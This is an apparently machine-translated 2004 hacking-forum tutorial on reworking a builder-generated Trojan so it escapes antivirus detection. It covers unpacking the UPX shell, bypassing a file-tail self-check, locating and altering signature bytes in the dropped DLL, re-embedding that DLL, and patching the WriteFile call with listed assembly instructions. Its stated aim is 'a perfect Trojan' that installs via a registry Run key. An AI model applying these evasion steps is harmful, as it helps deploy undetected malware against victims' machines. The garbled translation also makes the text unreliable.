M ** 2 Trojan full modification - Shell Specification Modification PEDIY
-------------------------------------------------- ------------------------------ http://www.hackbase.com Read: Time: 2004-12-6 6: 30:55 source: www.hackbase.com author: tankaiha [NE365] [FCG] home page: http: //www.vxer.net
Disclaimer: This article only is for technical research, in view of its possible harm, speaking very general, and the author does not provide any procedures and code!
First, the program running process
Generate m ** 2 Trojan files by m ** 2 builder, after running, the program will copy itself into the WINDIR / System32 / directory, the file name is preset (assuming aaa.exe) and deletes the original file. Then start a new process, extract and generate aaa.dll from the internal data data. Simultaneously modify the registry key hlm_software_microsoft_windows_currentversion_run. And enter the normal cycle, and do hook.
Second, modify the target
Alarms are alarms when Aaa.exe and AAA.DLL scans. Our goal, completely escaping the chasing of anti-virus software and running normally.
Third, the main file shell remove the check
The main program (aaa.exe) uses PEID to check the housing to UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [overlay], manually offset at the POPAD, and use the Recimport to repair the introduction table. (See the shell article related to fly)
00415218 FF96 E85E> Call DWORD PTR DS: [ESI 15EE8]
0041521E 61 POPAD
0041521F - E9 A418FF> JMP AAA.00406AC8
After the shell and repair the introduction table, double-click the program, the program cannot run normally. Tracking with ollydbg, there is jump as follows:
00404F4B 53 Push EBX
00404F4C E8 9BF5FF> CALL
00404f51 85c0 Test Eax, EAX
00404F53 75 07 JNZ Short Mir_Unpa.00404F5C
Before the command, the program has called setFilePointer to point the pointer to the file end, read the test data of the file tail, and determine. Solution, paste the end of the unsubstable file to the end of the shell, run the program again, and the program can run normally.
Four, the shell of the DLL file
Close the process, the AAA.dll checkered in the System32 directory, display is still UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [overlay], please refer to the fly heroes about the DLL shell article. When using the ollydbg manual shell, the relocation table is located at 003C73FE, the size BD2, with UPXANGELA repair, and the fixed file offset positioning 11000, and modifies the data of the Relocation table in the shelling file.
When entering the table, track the program entry and select an API call to follow, get the address 003c20c8 start, size 178 bytes, and fix it with Recimport.
The entry of the program is changed to EFF4. At this point, the modification of the DLL file is complete.
V. Script and modify the DLL file
The method of positioning the feature code, positioning, and modification of the DLL file with a signature locator. 6, PEDIY
This is the most critical step, because each runs AAA.exe, the program extracts and generates aaa.dll from its own data without using the DLL we modified, so we must modify us within AAA.exe. DLL embedded and let Aaa.exe run, generated a DLL file we have modified without a signature.
Copy AAA.exe to the WINDIR / System32 directory, load and run with OLLYDBG, set breakpoint BP CreateFilea. When the file name parameter is displayed as "Windir / System32 / Aaa.dll", manually track, find out the location as follows:
004063BA 50 Push EAX
004063BB E8 6CE0FF> Call
004063C0 8BD8 MOV EBX, EAX
004063C2 6A 00 Push 0
004063C4 8D45 E0 LEA EAX, DWORD PTR SS: [EBP-20]
004063C7 50 Push EAX
004063C8 8B45 F8 MOV EAX, DWORD PTR SS: [EBP-8]; here start modification
004063CB 50 Push EAX
004063CC 8B45 FC MOV EAX, DWORD PTR SS: [EBP-4]
004063CF 50 Push EAX
004063D0 53 PUSH EBX
004063d1 E8 4ee1FF> CALL
004063D6 53 PUSH EBX
004063D7 E8 38E0FF> CALL
When you write a WriteFile, the number of bytes written is sized because this is the size of the original DLL data in the file. Turn off OLLYDBG, open AAA.exe with UltraEdit, search "MZ", find the starting position of the original DLL file to populate 0, and do not exceed the number of bytes just recorded.
Use UltraEdit to open AAA.DLL (sheched), copy all data in the DLL to the EXE file offset at 00014798H (before self-check data), save and close. Modify the data of the last section of the EXE file with peinfo (BY: Crane), rawsize size plus 1bbd2 (this is the number of bytes of DLL), and Virtualsize is modified to the new Rawsize Press 1000h alignment, imageSize will automatically modify. In this way, we have placed the DLL that the signature modified in the exe file, modify the file instruction below (the Writefile just the WriteFile, mainly lpbuffer and nbytestowrite to modify), make it a AAA.dll file that is normal when it is running. The modification method is as follows:
004063C8 / E9 D42E00> JMP AAA.004092A1
004063CD | 90 NOP
004063 CE | 90 NOP
004063CF | 90 NOP
004063D0 | 90 NOP
004063D1 | E8 4ee1ff> Call
004063D6 | 53 PUSH EBX
The code of the void (004092A1) is as follows:
004092A1 B8 D2AB01> MOV EAX, 1BBD2
004092A6 50 Push EAX
004092A7 B8 A06F41> MOV EAX, AAA.00416F98; ASCII "MZP"
004092ac 50 Push EAX
004092AD 53 Push EBX
004092AE ^ E9 24D1FF> JMP AAA.004063D1 The 00416F98 points to the start address of the new DLL data in the file. After saving the modified, run the program. Normal execution.
7. Main program characterization modification
In this way, the characteristic interference of the DLL file in AAA.exe (because the DLL containing the signature "has been covered, the new embedded DLL has no signature), and the AAA.exe file itself is left. And modified. Process is slightly. After the modification is complete, OK. It has become a perfect Trojan.
